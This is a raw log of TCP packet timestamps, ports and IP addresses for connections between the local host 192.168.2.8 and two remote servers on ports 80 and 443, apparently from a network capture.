                                                                                                                                                                      Nov 6, 2023 15:35:09.758353949 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.758713007 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.758806944 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.759670019 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.759759903 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.761648893 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.761818886 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.762650013 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.762765884 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.763811111 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.763880014 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.764240980 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.764328003 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.764822960 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.764887094 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.765084028 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.765208006 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.767163038 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.767275095 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.767649889 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.767765045 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.768556118 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.768645048 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.769021034 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.769128084 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.771270990 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.771354914 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.771826029 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.771927118 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.772615910 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.772716045 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.774041891 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.774111032 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.774157047 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.774225950 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.774346113 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.774404049 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.774579048 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.774655104 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.775708914 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.775789976 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.776547909 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.776648045 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.777676105 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.777756929 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.778515100 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.778630972 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.779325962 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.779422998 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.780016899 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.780075073 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.780118942 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.780199051 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.780559063 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.780642033 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.781218052 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.781320095 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.782666922 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.782680988 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.782845020 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.783632994 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.783730984 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.784151077 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.784223080 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.784352064 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.784435034 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.785151005 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.785207987 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.785301924 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.785388947 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.786197901 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.786259890 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.786377907 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.786456108 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.786794901 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.786858082 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.787122965 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.787214041 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.788068056 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.788121939 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.788191080 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.788290024 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.789319038 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.789426088 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.789916992 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.789930105 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.790025949 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.790966034 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.791065931 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.792651892 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.792748928 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.793504000 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.793582916 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.794662952 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.794682026 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.794770956 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.799352884 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.799453974 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.799468040 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.799480915 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.799491882 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.799859047 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.800069094 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.800419092 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.800734997 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.801167965 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.801742077 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.802325964 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.802478075 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.803124905 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.803795099 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.804195881 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.804474115 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.805035114 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.805989981 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.806812048 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.807153940 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.807988882 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.808046103 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.162590981 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.164242029 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.166076899 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.166759968 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.167249918 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.167587996 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.168057919 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.168827057 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.169006109 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.172794104 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.172806978 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.173731089 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.174284935 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.174683094 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:10.174695969 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:11.267046928 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:11.267074108 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:11.267086983 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:11.267220020 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:11.599567890 CET4970980192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:11.752022982 CET8049709162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:11.752254009 CET4970980192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:11.752551079 CET4970980192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:11.904941082 CET8049709162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:11.924105883 CET8049709162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:11.924323082 CET4970980192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:11.929125071 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:11.929156065 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:11.929260969 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:11.990883112 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:11.990909100 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:12.313982964 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:12.314119101 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.150784016 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.150818110 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.151199102 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.151271105 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.153577089 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.201262951 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554254055 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554368019 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554383039 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554399967 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554415941 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554446936 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554451942 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554495096 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554501057 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554536104 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554543972 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554586887 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554591894 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554619074 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554634094 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554662943 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554706097 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554749012 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554771900 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554817915 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554847956 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554887056 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.554930925 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.554972887 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.555449009 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.555502892 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.555536985 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.555583954 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.555603027 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.555650949 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.555670977 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.555716038 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.556586981 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.556641102 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.556653023 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.556699038 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.556716919 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.556761026 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.557272911 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.557332039 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.557369947 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.557420015 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.557449102 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.557492971 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.557532072 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.557586908 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.558136940 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.558190107 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.558218956 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.558264017 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.558299065 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.558362961 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.558377981 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.558432102 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.558904886 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.559021950 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.559063911 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.559122086 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.559146881 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.559197903 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.559230089 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.559282064 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.559895039 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.559952974 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.559995890 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.560050964 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.560079098 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.560126066 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.560684919 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.560745001 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.560765028 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.560813904 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.560836077 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.560870886 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.626116037 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.626188040 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.626225948 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.626271963 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:15.626346111 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:15.626391888 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.017646074 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.017652988 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.017679930 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.017707109 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.020133018 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.020175934 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.020214081 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.020220995 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.020260096 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.023369074 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.023420095 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.023488998 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.023497105 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.023521900 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.023549080 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.025907993 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.025952101 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.025986910 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.025996923 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.026019096 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.026040077 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.028546095 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.028590918 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.028650999 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.028650999 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.028661013 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.028713942 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.031115055 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.031162977 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.031209946 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.031220913 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.031244993 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.031270027 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.034410954 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.034463882 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.034507990 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.034517050 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.034540892 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.034599066 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.036926985 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.036976099 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.037009954 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.037017107 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.037064075 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.037081957 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.039480925 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.039531946 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.039563894 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.039571047 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.039594889 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.039622068 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.042999029 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.043045998 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.043081045 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.043088913 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.043117046 CET49710443192.168.2.8162.159.135.233
